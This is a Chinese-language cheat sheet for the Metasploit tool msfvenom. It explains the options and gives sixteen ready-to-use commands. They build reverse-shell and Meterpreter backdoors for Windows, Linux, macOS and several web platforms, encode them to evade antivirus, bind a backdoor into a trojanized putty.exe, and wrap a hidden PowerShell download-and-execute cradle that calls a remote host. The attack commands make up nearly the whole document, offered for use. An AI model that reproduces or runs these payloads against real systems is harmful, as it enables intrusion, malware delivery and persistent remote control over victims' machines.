参数说明:
–p (- -payload-options)
添加载荷payload。
载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!
(- -payload-options 列出payload选项)
–l
查看所有payload encoder nops。
–f (- -help-formats)
输出文件格式。
(- -help-formats 列出所有文件格式)
Executable formats:
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats:
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
–e
编码免杀。
–a (- -platform – -help-platforms)
选择架构平台
x86 | x64 | x86_64
Platforms:
windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
–o
文件输出。
–s
生成payload的最大长度,就是文件大小。
–b
避免使用的字符 例如:不使用 ‘\0f’。
–i
编码次数。
–c
添加自己的shellcode。
–x | -k
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
实例:
实例1(简单生成):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -f exe -o /Users/jiangzhehao/Downloads/1.exe
-p 指定payload,payload后跟该payload的option;
-o 指定payload的保存路径,包含文件名
实例2(替换指定代码):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b '\x00' -f exe -o /Users/jiangzhehao/Downloads/1.exe
-b ,--bad-char 替换代码中会出现中断的字符,如 '\x00\xff'
实例3(指定编码器):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b '\x00' -e x86/shikata_ga_nai -f exe -o /Users/jiangzhehao/Downloads/1.exe
-e 指定特定的编码器
实例4(绑定后门到其他可执行程序上):
msfvenom -p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 -x /Users/jiangzhehao/Downloads/putty.exe -k -f exe -o /Users/jiangzhehao/Downloads/puuty_bind.exe
-p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 指定payload和payload的参数
-x /Users/jiangzhehao/Downloads/putty.exe执行要绑定的软件
-k从原始的注文件中分离出来,单独创建一个进程
-f exe指定输出格式
-o /Users/jiangzhehao/Downloads/puuty_bind.exe指定输出路径
实例5 Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe
实例6 Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
实例7 MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
实例8 PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
实例9 Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
实例10 Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
实例11 JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
实例12 War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
实例13 Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh
实例14 Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
实例15 Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
实例16 exe 利用exec执行powershell后门
msfvenom -p windows/exec CMD="powershell.exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.0.104:8080/4WFjDXrGo7Mj');" -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe
